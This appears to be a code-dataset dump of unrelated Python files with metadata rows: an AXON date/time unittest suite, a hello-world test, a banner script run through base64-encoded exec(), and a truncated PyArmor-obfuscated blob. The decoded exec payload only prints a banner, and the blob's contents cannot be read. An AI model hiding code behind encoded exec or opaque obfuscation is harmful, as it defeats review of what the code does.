|
[
"MIT"
] | 4
|
2015-02-07T13:29:43.000Z
|
2020-01-01T19:20:53.000Z
|
# coding: utf-8
from __future__ import unicode_literals
import unittest
from axon import loads, dumps
from datetime import date, time, datetime, tzinfo
class DateTime10TestCase(unittest.TestCase):
    """Round-trip tests for AXON date/time/datetime literals.

    Each test parses a ``^``-prefixed literal with ``loads``, checks the
    resulting Python type (and the ``tzinfo``/``utcoffset`` when a zone
    offset is present), then re-serialises with ``dumps`` and checks the
    canonical text form. Note that ``dumps`` shortens whole-hour offsets
    (``+01:00`` -> ``+01``) and zero-pads short ones (``+3:15`` -> ``+03:15``).
    """

    def setUp(self):
        # no shared fixtures; every test builds its own value
        pass

    def test_date1(self):
        v = loads('^2010-12-01')[0]
        self.assertEqual(type(v), date)
        s = dumps([v])
        self.assertEqual(s, '^2010-12-01')
    #
    def test_date2(self):
        v = loads('^1900-01-01')[0]
        self.assertEqual(type(v), date)
        s = dumps([v])
        self.assertEqual(s, '^1900-01-01')
    #
    def test_date3(self):
        # two-digit year literal
        v = loads('^12-01-01')[0]
        self.assertEqual(type(v), date)
        s = dumps([v])
        self.assertEqual(s, '^12-01-01')
    #
    def test_date4(self):
        # degenerate all-zero date literal
        v = loads('^0-00-00')[0]
        self.assertEqual(type(v), date)
        s = dumps([v])
        self.assertEqual(s, '^0-00-00')
    #
    def test_time1(self):
        v = loads('^00:00')[0]
        self.assertEqual(type(v), time)
        s = dumps([v])
        self.assertEqual(s, '^00:00')
    #
    def test_time2(self):
        v = loads('^23:59:59')[0]
        self.assertEqual(type(v), time)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59')
    #
    def test_time3(self):
        # microsecond precision survives the round trip
        v = loads('^23:59:59.000123')[0]
        self.assertEqual(type(v), time)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59.000123')
    #
    def test_time4(self):
        v = loads('^23:59:59+00:00')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59+00')
        self.assertEqual(v.utcoffset().seconds, 0)
    #
    def test_time5(self):
        v = loads('^23:59:59+01:00')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59+01')
        self.assertEqual(v.utcoffset().seconds/60, 60)
    #
    def test_time6(self):
        # negative offsets: timedelta normalises -01:00 to (days=-1, 23h),
        # so .seconds alone reads as 23*60 minutes
        v = loads('^23:59:59-01:00')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59-01')
        self.assertEqual(v.utcoffset().seconds/60, 23*60)
    #
    def test_time7(self):
        v = loads('^23:59:59+12:00')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59+12')
        self.assertEqual(v.utcoffset().seconds/60, 12*60)
    #
    def test_time8(self):
        v = loads('^23:59:59+23:00')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59+23')
        self.assertEqual(v.utcoffset().seconds/60, 23*60)
    #
    def test_time9(self):
        v = loads('^23:59:59-23:00')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59-23')
        self.assertEqual(v.utcoffset().seconds/60, 60)
    #
    def test_time10(self):
        # single-digit hour offset is zero-padded on output
        v = loads('^23:59:59+3:15')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59+03:15')
        self.assertEqual(v.utcoffset().seconds/60, 3*60+15)
    #
    def test_time11(self):
        v = loads('^23:59:59-3:15')[0]
        self.assertEqual(type(v), time)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^23:59:59-03:15')
        self.assertEqual(v.utcoffset().seconds/60, 1440-3*60-15)
    #
    def test_datetime1(self):
        # naive datetime: no tzinfo attached
        v = loads('^2010-01-01T00:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertEqual(v.tzinfo, None)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T00:00')
    #
    def test_datetime2(self):
        v = loads('^1-01-01T23:59:59')[0]
        self.assertEqual(type(v), datetime)
        self.assertEqual(v.tzinfo, None)
        s = dumps([v])
        self.assertEqual(s, '^1-01-01T23:59:59')
    #
    def test_datetime3(self):
        v = loads('^2010-01-01T23:59:59.000123')[0]
        self.assertEqual(type(v), datetime)
        self.assertEqual(v.tzinfo, None)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59.000123')
    #
    def test_datetime4(self):
        v = loads('^2010-01-01T23:59:59+00:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59+00')
        self.assertEqual(v.utcoffset().seconds, 0)
    #
    def test_datetime5(self):
        v = loads('^2010-01-01T23:59:59+01:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59+01')
        self.assertEqual(v.utcoffset().seconds/60, 60)
    #
    def test_datetime6(self):
        v = loads('^2010-01-01T23:59:59-01:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59-01')
        self.assertEqual(v.utcoffset().seconds/60, 23*60)
    #
    def test_datetime7(self):
        v = loads('^2010-01-01T23:59:59+12:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59+12')
        self.assertEqual(v.utcoffset().seconds/60, 12*60)
    #
    def test_datetime8(self):
        v = loads('^2010-01-01T23:59:59+23:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59+23')
        self.assertEqual(v.utcoffset().seconds/60, 23*60)
    #
    def test_datetime9(self):
        v = loads('^2010-01-01T23:59:59-23:00')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59-23')
        self.assertEqual(v.utcoffset().seconds/60, 60)
    #
    def test_datetime10(self):
        v = loads('^2010-01-01T23:59:59+3:15')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59+03:15')
        self.assertEqual(v.utcoffset().seconds/60, 3*60+15)
    #
    def test_datetime11(self):
        v = loads('^2010-01-01T23:59:59-3:15')[0]
        self.assertEqual(type(v), datetime)
        self.assertIsInstance(v.tzinfo, tzinfo)
        s = dumps([v])
        self.assertEqual(s, '^2010-01-01T23:59:59-03:15')
        self.assertEqual(v.utcoffset().seconds/60, 1440-3*60-15)
    #
def suite():
    """Return a TestSuite containing all DateTime10TestCase tests.

    Uses ``TestLoader().loadTestsFromTestCase`` because ``unittest.makeSuite``
    has been deprecated since Python 3.11 and removed in 3.13.
    """
    suite = unittest.TestSuite()
    suite.addTest(unittest.TestLoader().loadTestsFromTestCase(DateTime10TestCase))
    return suite
| 33.923445
| 64
| 0.569676
| 983
| 7,090
| 4.077314
| 0.081384
| 0.265719
| 0.06487
| 0.129741
| 0.847305
| 0.832335
| 0.818862
| 0.81487
| 0.792665
| 0.786677
| 0
| 0.14248
| 0.252609
| 7,090
| 208
| 65
| 34.086538
| 0.613889
| 0.001834
| 0
| 0.494318
| 0
| 0
| 0.124557
| 0.063839
| 0
| 0
| 0
| 0
| 0.494318
| 1
| 0.159091
| false
| 0.005682
| 0.022727
| 0
| 0.193182
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c42d383aeb5469d6edd6c6a01a11e1625c720775
| 121
|
py
|
Python
|
tests/test_pyramid_helloworld.py
|
mardiros/pyramid-helloworld
|
15455f2e3ca2f5e3efb6f0482b78302078f1ce2c
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_pyramid_helloworld.py
|
mardiros/pyramid-helloworld
|
15455f2e3ca2f5e3efb6f0482b78302078f1ce2c
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_pyramid_helloworld.py
|
mardiros/pyramid-helloworld
|
15455f2e3ca2f5e3efb6f0482b78302078f1ce2c
|
[
"BSD-3-Clause"
] | null | null | null |
from pyramid_helloworld import hello_world
def test_hello_world():
    """The view should respond with the canonical greeting text."""
    response = hello_world(None)
    assert response.text == "Hello World!"
| 20.166667
| 51
| 0.768595
| 17
| 121
| 5.176471
| 0.647059
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140496
| 121
| 5
| 52
| 24.2
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.099174
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
670e65530c18122225169e922b2fa4c9585dcad8
| 792
|
py
|
Python
|
lib/logo.py
|
buchin1337/mbf-fb
|
7512c948e36e89e0beb507f21004259b62fedbd4
|
[
"Apache-2.0"
] | 1
|
2020-08-13T08:41:17.000Z
|
2020-08-13T08:41:17.000Z
|
lib/logo.py
|
buchin1337/mbf-fb
|
7512c948e36e89e0beb507f21004259b62fedbd4
|
[
"Apache-2.0"
] | null | null | null |
lib/logo.py
|
buchin1337/mbf-fb
|
7512c948e36e89e0beb507f21004259b62fedbd4
|
[
"Apache-2.0"
] | null | null | null |
# Coded by ./Buchin1337
# SECURITY NOTE(review): this module runs a base64-obfuscated payload through
# exec() at import time. Decoding the literal, it appears to define ANSI
# color codes and a banner() function that calls os.system('clear') and
# prints ASCII art — but obfuscated exec is a malware red flag: decode and
# review the payload before trusting or importing this module.
import base64
exec(base64.b64decode('aW1wb3J0IG9zDQp3ID0gJ1x4MWJbMTszN20nDQpiID0gJ1x4MWJbMTszNm0nDQpnID0gJ1x4MWJbMTszMm0nDQp5ID0gJ1x4MWJbMTszM20nDQpyID0gJ1x4MWJbMTszMW0nDQoNCmRlZiBiYW5uZXIoKToNCglvcy5zeXN0ZW0oJ2NsZWFyJykNCglwcmludChmJycne3l9ICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqDQp7cn0g4oCmLi5fX19fX19fX19fX19fX19fX19fXyAsICxfXw0K4oCm4oCmLyBg4oCUX197d30gLi9CdWNoaW4xMzM3e3J9IF9fX+KAlC1fX19fX3xdIOKAkyDigJMg4oCTIOKAkyAtIOKAkyDigJMg4oCTIOKWkSDilpLilpPilpPilohEDQrigKYuLi9fPT1vOzs7Ozs7OztfX19fX19fLjovDQrigKYuLiksIOKAlC4oXyhfXykgLw0K4oCmLi8vICguLikgKSwg4oCULeKAnQ0K4oCmLy9fX18vLw0KLi4vL19fXy8vDQouLy9fX18vLyB7Z30g4oCcQWt1IGJvbGVoIGphZGkgcGFjYXJtdT8iDQp7d30g4pml4pmgIHtifSAiNDAwKEJhZCBSZXF1ZXN0KSIge3d94pml4pmgwqANCnt5fSAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKicnJyk='))
| 198
| 754
| 0.977273
| 10
| 792
| 77.4
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 0.007576
| 792
| 3
| 755
| 264
| 0.824427
| 0.026515
| 0
| 0
| 0
| 0
| 0.945455
| 0.945455
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
6727bcd870b9b1dbf8194546ee2c1f34ba1d2589
| 11,007
|
py
|
Python
|
Assignments/Assignment_03/ekf/solution/measurementmodels.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Assignments/Assignment_03/ekf/solution/measurementmodels.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Assignments/Assignment_03/ekf/solution/measurementmodels.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x07\x2c\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x76\x0a\x00\x00\x00\x00\x00\x10\xe1\x0b\x7e\xde\xfa\xc2\xb6\x4c\x15\x4c\xba\x53\xd6\xeb\x8b\x12\x00\x00\x00\x00\x00\x00\x00\x00\x19\x1b\x9a\x62\xc3\xab\xc9\xf4\xe8\x97\x8b\x89\xda\x34\x6a\xb9\x3d\x20\x78\x46\xec\x5d\xcd\x18\xd3\x10\x2e\x0c\xf6\x89\x9d\x28\xae\x7e\x40\x00\x93\xbd\xe0\x7b\x69\xcb\x8e\x3f\x71\xf5\x3a\x7d\x42\x3e\x8b\x7d\x35\x58\x90\xc9\xad\x2a\x2c\x26\xb3\x29\xe8\xca\xad\xb4\x2e\x01\x6d\x51\x23\x33\xc1\xba\x3a\xf7\x62\x23\x72\xc5\x8f\x54\x6c\xe8\x0d\xc6\x31\x4a\x5c\xca\x50\xaf\x8a\xa8\x46\xac\x46\x20\x16\x5f\x33\x37\x9b\x86\x84\x1c\x99\xde\x02\x51\x58\x5b\x18\xd6\x45\xc9\x98\x8d\xb8\x08\x41\x23\xc9\x09\x93\x5d\x0e\xe3\xf9\x54\x5c\xed\x41\x96\x9c\x5c\xa5\xe9\x93\xb8\xee\xf2\x2c\x00\x1f\xfc\x35\xb4\x2f\x3d\x99\xaf\x36\x52\xaf\xcc\x41\x78\xa5\x07\xea\x56\xd5\xc0\x54\x98\xdb\x30\xa9\x72\x3d\x95\xf3\xac\x57\x8a\x4f\x54\x2b\x0f\x22\x38\x95\x44\xeb\x7f\x94\xc8\xf8\x69\x1a\xe5\x32\x71\xaa\x79\x6c\x54\x93\xa8\xc9\x2b\x42\x5c\x9d\xba\x87\xf8\x63\x30\x54\xfe\x0e\x79\x43\xba\xf5\xd6\xbb\xca\x9c\x7b\xc7\x13\xcc\xc3\xef\x02\x68\x32\x1b\xab\xfd\xe3\x5d\x09\x33\x51\x79\x64\x53\xc7\xeb\xe8\xf6\x56\x13\x0a\x21\x64\xaf\x77\x42\xf3\xc7\xce\x39\x42\x8a\xd3\x4c\xb4\x63\xaf\xd5\x4a\x6e\x39\x7b\x97\xa8\x0d\x55\x3c\x70\x20\xd5\x04\x01\x5b\x2d\xa0\xd5\xa6\xf6\xc7\x71\xc2\xea\x78\x8b\x45\x09\x6b\xa7\x8d\x93\x0c\x98\xd8\xbb\x87\x3a\xa4\xf4\x8b\x27\x59\xa5\xab\xa0\x86\x2e\x86\x52\xeb\xce\x5a\xa4\xe5\x53\x44\x17\x1d\xc9\x52\x24\x85\x19\x3e\xe6\x44\x09\xe2\x72\x28\xbe\xa1\xc1\x22\x1b\xbb\xeb\x71\x7c\xfa\xc3\x65\x4b\xcd\xec\xde\xb5\xee\xb9\x8c\xdd\xb6\xb8\xdd\x9f\x52\x0a\xc7\x58\x58\x1c\x6f\xf1\x00\xc0\x6c\x68\x6a\xee\xe1\x60\x48\x4d\x33\x8c\x1a\x4b\xd1\x47\xd3\xa7\x7f\x8c\x5a\x0f\x46\x17\x0a\x35\xf9\x90\xd6\x9e\xfe\x30\x64\xdb\x74\x96\x6d\x7a\xf9\xfd\xb0\x40\x49\xa8\x71\x78\x10\x49\xac\xa3\x3d\xcd\x28\xe3\x50\x5a\x2b\x73\x
95\x7c\x85\x31\xe3\x10\x63\x39\x79\x50\x61\xa3\xae\x4f\x42\xbd\x5d\x20\x47\xf0\xee\x2c\x61\xdf\xfe\xad\x6e\x34\x3a\xcd\x85\xc4\x14\xb5\x71\x24\x0c\x1d\xca\x69\xeb\xd0\xbd\x00\xb3\xbd\x82\xb6\xf2\x79\xc1\x8d\x4a\x4b\xd3\x1a\x53\xad\x93\x8a\xd7\x5f\xe2\xe3\x82\x05\x67\x8d\x12\xc3\xf7\x0f\x33\x09\x63\x2f\x16\x7b\x52\x60\x76\xe5\x30\xb7\x42\x44\xff\x41\x60\xf4\xf7\x91\x06\xef\x99\xae\xc6\x01\x8e\x1b\x22\x0b\x6a\x34\xc9\x63\xd5\x9f\x26\x52\xeb\x4e\x9f\xa5\xc0\xc9\xf7\xea\x42\x96\x73\x29\x68\x97\xa0\xf5\x99\x35\x8f\xc0\xcb\x64\x64\xb8\x2a\x4a\xbf\x84\x7b\xf7\x34\x62\x9c\x24\x13\x5a\x75\x9a\xa3\xc5\x1c\x86\xf7\x8e\x50\xee\x03\x45\x61\xe3\xcb\xe2\x76\xc4\xf6\x8d\xf1\x6a\xd2\xed\x14\x4f\xc6\xaa\xce\x92\x76\x70\x45\xa5\xa9\x98\xfb\xad\x02\xa7\x0a\x0d\x95\x5e\xb5\x57\x81\xd8\x5d\x6c\x69\xdd\x87\xd4\x27\x4b\xbf\x06\xbe\x7d\x1c\x6c\x38\x18\x59\x2d\x3e\x04\x7f\x9b\x03\x9d\xfa\x97\x15\x14\x3a\x8e\x37\x05\x3f\xfd\x20\xdf\x37\x79\x4b\xb5\x51\x9d\x1c\x88\xaf\x5d\xb4\x44\xe2\xe9\xba\x2c\xf6\xcd\xef\xd3\x87\xb8\x5f\x08\x4b\xeb\x85\x23\x70\xe0\x5f\x5c\x81\x32\x5d\xd1\x8a\x97\xf7\x74\xac\xa6\x0c\x55\x21\x0c\x52\x5a\x9c\x11\x41\x03\xd2\x84\x40\xc1\x17\xf2\x69\x9e\x02\xf2\x0c\xe8\x4b\xcd\x3c\x81\x9d\xa0\x4b\x0f\x18\x6d\x0b\xa3\x38\x2e\x8f\x55\x97\x94\xf6\x9b\x2d\x32\xa2\x28\xb3\xec\xab\x17\x03\x1d\x77\x57\x3c\x42\x6a\x1a\x21\x6f\x23\xc7\x2b\xd8\x64\xe9\xac\x2f\x17\xa4\xb1\x2c\x6f\x6c\xc6\x09\xc6\x98\x8a\x8a\x7c\x16\x80\x33\x41\xef\xb4\x53\x2e\xd8\x45\xab\x7a\x54\xcb\xf5\x75\xab\xe4\xb5\x78\xa8\x89\x70\xf3\x8a\xaf\x7b\x20\xd8\xbc\xc4\x21\x71\x83\x54\x52\xc3\x46\x88\x1f\xde\xc6\x3b\xac\x5f\xb6\x11\x9e\x6b\x08\x8b\x72\x7c\xd7\x8f\x7b\xce\x10\xb1\x27\x23\x08\x5f\xa3\x34\x94\x3c\xe3\xb0\x0b\xce\x44\xbc\x11\xa0\x4c\x6f\x53\x94\x01\x4b\x9c\x68\x25\xa1\xb6\xca\x0c\x6f\x52\xba\x9e\xce\x46\x9f\x50\xc3\xff\xd4\xdd\x7f\x52\x7b\xcc\x9d\x43\x8d\x8b\xf7\x43\x3d\xaf\xaf\xac\x78\x0b\xc2\xda\x77\x2a\xa4\x3c\xc9\x3d\x0b\xf7\x50\x1c\xcf\xaf\x59\x75\x4a\x7d\x2c\xb0\x12\x77\x4b\x44\x65\x83\xd6\xa9\xb9\xa6\x04\x
e4\x02\xc2\x8e\x00\x53\xbe\xb0\xfb\xc1\xd6\x48\x4a\xf3\x28\xb6\x27\x51\x74\xd9\x12\xa1\x90\xce\xfb\x8c\xd7\x4f\xa5\x96\x6d\xce\x65\x98\x99\xc6\xd0\x7f\x84\x85\xb4\xc8\x9d\x8e\x44\x33\xba\x72\x9b\x09\x72\x0f\x5e\xed\x8f\xed\xfd\x12\x80\x4c\x43\x6f\x98\xd4\xb4\x7d\x83\x8a\x33\xca\x00\x45\x57\x27\x8f\x61\x48\x00\x68\x96\xb0\xb6\x06\x67\x22\x80\x41\x94\x1c\x19\x04\x56\x09\x04\x71\x9d\xd8\x4e\x4c\xc4\x7f\x69\xc3\x06\xab\x79\x6a\x1f\x1a\xa3\x71\x1f\x8f\xa3\x3a\x86\x3d\x41\xe4\x4a\x70\x30\x27\x44\xbf\xfc\xae\xe9\x4c\xdf\x58\x55\xcf\x90\x8d\xad\xae\x25\x11\x48\xa5\x6a\x1d\x9e\xc0\x07\xd3\x16\xe1\x7f\x57\xfd\x03\x13\xcb\xba\x89\x54\xfd\xcd\x50\x69\xba\xd0\xaf\x27\x28\xcd\xb9\xae\x62\xde\x19\x66\x70\x69\x03\xb7\x2d\xb4\xcc\x52\x7f\x69\x02\xb9\x22\x76\x14\x91\x43\x0d\xdd\x72\xf0\x04\xed\x0d\xcd\xa9\x0b\x03\x81\x0e\xe7\x2a\x6b\x46\xcc\xbc\x9a\x2a\x0e\xd5\x68\x10\xfb\x99\x6d\xd1\xce\x21\xa0\x2f\xc8\x72\x1b\xef\xba\x20\x0b\xa5\xfa\x3a\xba\x1f\x91\x0e\x7b\xce\x87\x66\xcb\x59\x84\x1b\xea\xc2\x28\x17\xce\xea\xdb\x94\x39\x7b\x68\xb5\x89\x72\x3e\xfa\xd9\x48\xc6\x79\x15\xc3\x66\x44\xa2\xee\xda\xb6\x78\x6b\xb6\x94\x84\x71\x07\xac\x3e\x33\x91\x01\xb4\x1b\x27\xe8\x9b\xa0\xa4\x1c\x7d\x17\x03\xbc\xd0\x09\xd4\x07\x1f\x17\x35\x6c\xa5\x34\x30\x7c\x55\xb5\x9d\x43\x95\x8e\x6f\xc8\xf9\xc2\x14\xb0\xb1\x6c\x8f\xc3\x91\x18\x67\x0f\x36\x25\xb9\x7e\x6c\x02\x0c\x15\x6c\x30\xa8\x85\xa3\x52\xfe\x34\xcd\xec\x6e\x49\xcd\x19\xcc\x42\xd0\x9f\xfc\x1f\x57\xc7\x96\xd6\x0e\xb5\xdf\x02\x4a\xc3\xec\x46\x74\x67\xd8\x9d\x16\x7f\x0b\x6b\x6b\xf5\x9b\x63\xc0\x75\x40\x9b\x40\xf8\x14\xb6\x85\x75\x8a\x9c\xc8\x92\xd6\x0c\x7e\x44\x2c\x55\xfa\x06\x0b\x76\xeb\xb2\xb6\xe3\xa1\x69\x07\x67\xca\x21\x95\x4b\x05\xbd\x65\x65\xbe\xad\xfa\xb5\x91\xd7\x11\xdb\x17\x74\x5a\xe4\xbe\x63\x49\x1e\x6b\x9f\xf1\x50\xfb\xb8\xcd\x2b\x16\xf7\x03\x39\xa8\x31\x6c\xcf\x18\xfc\x6b\x32\xbc\x06\x0c\xab\x6d\xa6\x55\xa5\x73\xd4\x29\x5e\xc5\x84\x14\x25\x61\xe4\x4a\x55\x8b\x62\x55\xce\x27\xe7\x54\x75\x31\xed\x57\x0e\x5f\x40\x41\xf8\xc1\xed\x75\x16\x3b\xe7\x
a8\xe8\xa1\x95\x5c\xa2\x33\x8b\x99\x6e\x1d\xbf\x82\x7d\x8e\x93\x6a\xf0\x1a\xa8\xb1\x5b\xb1\x6a\x22\xcd\x9b\xbc\xbd\xd1\xae\xdf\xbc\x22\xdb\x14\x88\x55\xc2\xc3\x7a\xd7\xdc\xc7\xa3\x5a\xb9\x70\x1f\x21\x8b\x35\x8b\x18\x07\x5e\xaf\xf9\x71\x31\xb3\xdb\xce\x5f\x17\x1b\x36\x4e\xa8\x6a\x2b\xb6\x35\xa2\xde\x1e\xa2\xcf\xde\xe5\x69\x1c\xa0\x0f\xa0\x33\x6a\xfe\x59\x5d\x23\xaa\x3f\x2e\x16\x02\x08\x3e\x93\xa1\xaa\x4e\x8c\xd3\x68\x8c\x82\x20\x1e\x1b\x53\x23\x3c\x03\xc3\x06\xfe\x39\x8c\xb0\xf0\x92\x55\x16\x81\x07\x7a\xdb\x81\x42\x9c\xb2\xe2\x93\x32\x30\x63\x6d\x58\xd0\x01\x8b\x9c\xc8\x86\xe6\xd5\xf7\x5a\xff\xbd\x2c\x2f\x99\xd0\x0d\x4e\x3e\xc8\xe8\x12\x28\x10\xbb\x2c\x32\xb6\x6d\x61\xe1\xc4\x35\x02\x53\xce\x32\x98\x7b\x8c\x23\x44\x91\x22\x9d\xd2\xcd\xaf\x5b\xa3\xdd\xd5\xf8\x9b\x8a\x6a\x2a\x63\x0e\x17\x03\x72\x0d\xef\xef\xcf\xf0\x97\x3f\x29\x92\x6b\x63\x1a\x21\x62\x29\xaf\xb8\x20\x1f\x6d\x31\xbd\xfe\x84\x80\xaa\xad\xc0\x9e\xbc\x0e\x0e\xd3\x7e\xbb\x40\x31\xc3\xc7\xb1\x29\x88\x1c\x69\x25\xb1\xe4\x80\x99\x0b\x52\x24\x20\x5d\x64\x7c\x53\xd9\xdd\x05\x2a\x08\xd9\x7c\x9e\x16\xdb\x54\xf8\x72\x5c\xce\xb4\x2b\xc2\x7b\xdb\x41\x74\x23\x80\xe0\x68\xad\x1c\xe6\x71\x36\x3d\x1f\x17\xb9\x36\xbd\x1f\xe1\x98\x0d\x06\x80\x9c\x78\x39\xb6\x03\xca\xa8\x9a\x6d\x1b\x82\x66\x61\x22\x29\x4b\x6a\x1b\x2c\xf7\xc9\x0e\xc1\x7f\xa9\x3f\xdd\x43\x43\x2a\xc7\x56\x3d\x79\x96\xbf\x8d\xc6\xee\x1a\xb7\x21\x7f\x96\x51\x9f\x1b\x81\x06\x61\xb6\xf2\x4a\x26\x98\x48\x54\x15\x6d\xf1\x2e\x93\x0f\xba\x2a\xea\xf0\x97\xb3\xdc\x1f\x35\xf5\xeb\xf7\xa8\x49\x70\x1d\x69\x0e\x3d\x93\xce\xcd\x56\x0d\xa2\x00\xe5\xb4\x5a\x04\xed\x46\xa9\x06\xec\x9c\xc8\x7d\xf5\x31\x75\x9f\x51\x56\x79\xe2\x26\x50\x04\x9b\x99\x60\xcc\x2a\x91\xf5\x60\x53\x63\xae\xcd\xbe\xbf\x02\x3d\x4c\x8e\x1b\x36\x29\x29\x1e\xed\xfa\x18\x3a\x87\x01\xfe\xd6\x76\x48\xd5\x5f\x4b\xc5\xd6\x1b\x82\x06\x21\x69\xac\x40\xaf\x9c\x1f\xeb\xbf\x80\xe5\x5c\x66\xde\x22\x0b\xb3\x6f\xf4\x8b\x94\x1d\xce\xde\x45\x9e\x19\x66\x7c\x53\x55\x49\x98\xa8\x44\xe2\x47\xd4\xfe\xa6\x41\xbc\x93\x4e\xa5\x3f\x
99\xb5\x53\x9a\xfa\x4b\x3d\xdc\x24\x18\xe5\x0d\x37\x16\x5c\xe3\x1f\x8e\xa3\x31\xb9\x95\x32\x79\xdb\x4e\x71\xd1\xb3\x1c\x59\x30\xf1\x1b\x29\xab\xc3\x99\xdf\x7a\x92\x84\x03\xce\x36\x5c\x99\x70\xce\xc2\x4a\x07\xa5\x5f\x7b\x5d\x1a\x80\x5d\x58\x64\x53\xdb\xcb\xb8\x14\x7f\x7c\x3d\x7f\x0e\x63\x95\xbd\x71\xf6\x21\x9a\x2b\xd6\x29\x70\x86\x64\x6b\x16\x57\xec\xc6\x99\xe7\xdf\x95\x61\x70\x29\x03\x42\xe8\x3e\xcb\x44\x78\xb0\xdc\x96\xf2\x3b\x98\x33\x7c\x3f\x2a\x75\xaa\x74\xc0\xb7\xf2\x84\xa4\x25\x16\xa9\x35\x7f\x29\xbf\x3d\x73\x4f\x0d\xf4\x22\x32\xa0\xcd\xf5\xe2\x46\x0b\x13\x9c\xf6\xde\x17\xa4\x5f\x3a\xe6\x2d\x7f\x2a\xa9\x30\x68\x46\xa4\x3f\x23\xb6\x5e\x5f\xa8\xe4\xda\xba\xaf\x9e\x41\xc4\xdf\x72\xaa\xe9\xac\x02\xb6\x52\xf3\x9c\x1b\x1a\x85\x86\x72\xe0\x4c\x5e\x11\x63\x81\xbd\xcc\x10\x07\x2e\x29\xa9\x1c\x36\xe9\x18\xc3\xc1\x49\x2b\xfb\x4d\x8f\x89\xb7\x72\x43\x72\x28\x90\xef\x30\x66\x10\xe8\x05\x2a\x9f\x00\xc1\xc8\xa9\x22\x0e\xf6\x12\x92\x29\x8a\x2d\xde\xb8\xaa\x13\x0a\xb8\xf9\x7e\x85\x40\xc8\x18\x6c\xdb\xad\x7d\x4c\xa9\xe3\x3e\xb9\x4b\x87\x8b\xbf\x0a\x0a\xfd\xd0\x43\x51\xee\x48\xb0\xc3\x38\x2c\xc8\x86\xc9\x57\xcf\x54\x7e\x50\xb7\x56\x5e\xdf\x21\x1b\xae\xcd\x4b\x45\x5c\x65\x0d\x9f\xd4\x2c\xf0\xe1\x54\xad\xdc\x46\x